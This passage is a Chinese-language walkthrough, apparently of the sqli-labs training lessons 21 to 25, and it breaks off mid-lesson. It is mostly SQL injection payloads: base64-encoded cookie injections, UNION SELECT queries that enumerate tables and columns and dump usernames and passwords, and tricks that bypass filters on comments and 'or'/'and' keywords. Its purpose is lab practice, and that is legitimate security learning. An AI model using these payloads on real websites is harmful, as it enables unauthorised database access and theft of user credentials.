对抓包的cookie解码,不过不太对
那么“%3D” 是 URL 编码中的等号,所以将YWRtaWRta4=破译(decode),对这base64解码
那我们注入的时候八码编码为base64就好,试一下看看怎么样,得到了注入点为’)
Cookie: uname=admin’)# Cookie: uname=YWRtaW4nKSM= Cookie: uname=1’) UNION SELECT 1,2,3# Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsMyM= Cookie: uname=1’) UNION SELECT 1,2,database()# Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZGF0YWJhc2UoKSM= 接下来要换成updatexml语句了,不然会报错 Cookie: uname=1’) UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = ‘security’# Cookie:uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBXSEVSRSB0YWJsZV9zY2hlbWEgPSAnc2VjdXJpdHknIw== Cookie: uname=1’) UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema = ‘security’ AND table_name = ‘users’# Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgQU5EIHRhYmxlX25hbWUgPSAndXNlcnMnIw== Cookie: uname=1’) UNION SELECT 1,2,group_concat(concat(“:”,username,password)) FROM security.users# Cookie: uname=MScpIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbmNhdCgiOiIsdXNlcm5hbWUscGFzc3dvcmQpKSBGUk9NIHNlY3VyaXR5LnVzZXJzIw== Less22 总的来说与Less21基本一样,不过注入点为双引号" Less23 输入?id=1正常显示,输入?id=1‘或者?id=1’)或者?id=1’))报错,加入注释符–+或者#还报错,那么推测也许将注释符号过滤了,那么尝试//‘?id=1’(这语句结束后带个’来与括号后的’闭合从而结束语句)‘,那么尝试下万能语句看看?id=1’ or 1=1 or’显示正常了,?id=1’) or 1=1 or’或者?id=1’)) or 1=1 or’报错,那么注入点为’输入语句 ?id=-1’ UNION SELECT 1,2,3 ’ 爆库 ?id=-1’ UNION SELECT 1,2,database() ’ 爆表名 ?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=‘security’ ’ 爆字段吧 ?id=-1’ union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema=‘security’ and table_name=‘users’ ’ 爆数据的时候报错了 ?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users’ 那么也许格式语法问题,不过用个where语句试试看 ?id=-1’ UNION SELECT 1,2,group_concat(concat_ws(‘:’,username,password)) FROM users where ‘1’='1 这语句成功通过 Less24 在登陆界面注入登录失败了,那么输入admin看看会发生什么显示你可改密码,返回页面点new users click here设置新用户admin’看看然后返回主页面登录成功 Less25 明显的提示all your ‘or’ and ‘and’ belong to us 照例先输入?id=1或者?id=1’或者?id=1’)或者?id=1"或者?id=1") 那么输入?id=1’或者?id=1’)报错了 加上注释符f分别输入?id=1’–+跟?id=1’)–+ 那么?id=1’–+没报错,猜测注入点为’ 根据提示your ‘or’ belong to us那么用or构造个万能语句看看输入?id=1’ or 1=1–+ 显示为报错 那么怎么使用or不报错了 试试在语句or插入一个or语句,如果中间or被过滤掉了剩余部分构成or就成功了 判断列数 ?id=1’ oorrder by 4–+ 使用union语句 ?id=-1’ UNION SELECT 1,2,3–+ 爆库 ?id=-1’ UNION SELECT 1,2,database()–+ 爆表名 ?id=-1’ UNION SELECT 1,2,group_concat(table_name) FROM infoorrmation_schema.tables WHERE table_schema = ‘security’–+ 爆字段名
